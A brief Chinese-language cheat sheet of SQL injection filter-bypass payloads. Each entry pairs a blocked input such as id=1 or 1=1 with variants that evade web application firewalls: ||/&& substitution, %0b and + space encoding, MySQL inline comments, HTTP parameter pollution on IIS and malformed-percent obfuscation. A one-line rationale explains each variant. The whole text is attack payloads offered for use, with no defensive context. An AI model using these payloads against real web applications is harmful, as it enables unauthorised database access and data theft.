注入绕过笔记

拦截:id=1 or 1=1  绕过:id=1 || 1=1
拦截:id=1 and 1=1 绕过:id=1 && 1=1
原理:在php中or和||相当,and和&&相当

拦截:id=1%20or%201=1
绕过:id=1+or+1=1
id=1%0bor%0b1=1
id=1--s%-aor--s%0a1=1
id=1/*!or*/1=1
id=1()or(1=1)

拦截:id=1%20or%201=1
绕过:id=1/*&id=*/or/*&id=*/1=1

原理:IIS接收后实际转为id=1/*,*/or/*,*/1=1

拦截:id=1%20or%201=1
绕过:id=1%%20o%r%20%1%=1
原理:IIS接收%后如果后面不是正常的16进制编码就去掉%

发表评论